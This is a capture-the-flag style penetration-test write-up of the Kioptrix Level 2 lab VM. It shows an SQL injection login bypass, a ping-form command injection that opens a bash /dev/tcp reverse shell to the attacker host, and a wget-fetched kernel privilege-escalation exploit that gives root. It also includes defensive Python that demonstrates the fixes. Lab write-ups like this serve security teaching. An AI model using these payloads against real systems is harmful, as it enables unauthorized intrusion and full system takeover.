Kioptrix Level 2
This penetration test report against target system 192.168.133.142 (CentOS 4.5) identifies several serious vulnerabilities: Apache 2.0.52 carries denial-of-service, buffer-overflow and remote-code-execution risk; SQL injection on the login page bypasses authentication; command injection in the web application allows remote command execution. After obtaining apache-user access through a reverse shell, a local privilege-escalation exploit yielded root. 2025-9-13 07:48:58 Author: infosecwriteups.com

Mostafa Ahmed

Penetration Testing Report

Target System: 192.168.133.142
Operating System: CentOS release 4.5 (Final)

Reconnaissance & Network Scanning

Tool Used: arp-scan
Command:

sudo arp-scan -l

Findings:
Discovered the target machine on the local network:

  • IP: 192.168.133.142

Port Scanning & Service Enumeration

Tool Used: nmap
Command:

nmap -sV -O 192.168.133.142

Results:

OS Identified: Linux 2.6.X (CentOS 4.5)

Vulnerability Research

Tool Used: Searchsploit
Command:

searchsploit Apache 2.0.52

Findings:

  • Apache 2.0.52 has known vulnerabilities, including:
      ◦ GET Denial of Service
      ◦ mod_ssl buffer overflows
      ◦ Remote Code Execution (via various vectors)

Web Application Testing

1. Login Page SQL Injection

Observed Page: Remote System Administration Login

Payload Used:

Username: admin'-- 
Password: (blank)

Result: Successful login → indicates SQL Injection vulnerability

2. Command Injection

Observed Page: Ping utility

Vulnerability: The host field is passed to the system shell without sanitization → allows command injection

Gaining Shell Access (Reverse Shell)

Listener Setup:

nc -nlvp 3000

Command Injection Used (via ping form or web shell):

192.168.133.140;bash -i >& /dev/tcp/192.168.133.140/3000 0>&1

Result: Reverse shell established as:

id 
# uid=48(apache) gid=48(apache) groups=48(apache)
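As an added defender-side example (not code from the original write-up), the Python block below reproduces the two web flaws above against a constructed in-memory SQLite table and shows the fixes: the string-built login query that the `admin'-- ` payload bypasses next to its parameterized form, and a ping-target validator that returns an argv list for `subprocess` without a shell, so the `;bash -i ...` injection never reaches a shell. The table contents, the function names and the stored password are assumptions.

```python
import ipaddress
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the target's login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    return db


def login_vulnerable(db, username, password):
    """String-built query: admin'-- turns the rest of the WHERE clause
    into a comment, so the password check never runs."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Bound parameters: the input is compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


def validate_ping_target(target):
    """Return the target as a canonical IP string, or None if it is not
    a bare IPv4/IPv6 address (shell metacharacters never get this far)."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def ping_argv(target):
    """Build an argv list for subprocess.run(argv) with shell=False;
    the validated address is a single argument, not shell text."""
    ip = validate_ping_target(target)
    if ip is None:
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "3", ip]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login bypassed:", login_vulnerable(db, "admin'-- ", ""))
    print("parameterized login bypassed:", login_parameterized(db, "admin'-- ", ""))
    print(ping_argv("192.168.133.140"))
    print(validate_ping_target("192.168.133.140;bash -i >& /dev/tcp/192.168.133.140/3000 0>&1"))
```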

Privilege Escalation

System Info:

cat /etc/*-release
# CentOS release 4.5 (Final)

Serve the exploit source from the attacker machine with Python's built-in HTTP server:

python -m http.server 80

Exploit Used: 9542.c (likely a kernel local privilege escalation exploit)
Steps:

cd /var/tmp/
wget http://192.168.133.140:80/9542.c
gcc 9542.c -o exploit
chmod 777 exploit
./exploit

Result:

id 
# uid=0(root) gid=0(root) groups=48(apache)

🟢 Root shell successfully obtained.

Conclusion

The penetration test against the target machine 192.168.133.142 successfully demonstrated multiple critical security weaknesses that could be exploited by an attacker to gain full control of the system.

Key conclusions:

  • The system is running outdated and vulnerable software, specifically CentOS 4.5 and Apache 2.0.52, which are known to have several publicly available exploits.
  • A SQL Injection vulnerability in the login form allowed bypassing authentication without valid credentials.
  • A command injection flaw in the ping functionality of the web application allowed remote command execution.
  • Using these vulnerabilities, we successfully gained a reverse shell with apache user privileges.
  • Finally, a local privilege escalation exploit (compiled and executed on the target) granted root-level access, completely compromising the machine.

Root access obtained: Full system compromise.


Source: https://infosecwriteups.com/kioptrix-level-2-54617906d64c?source=rss----7b722bfd1b8d---4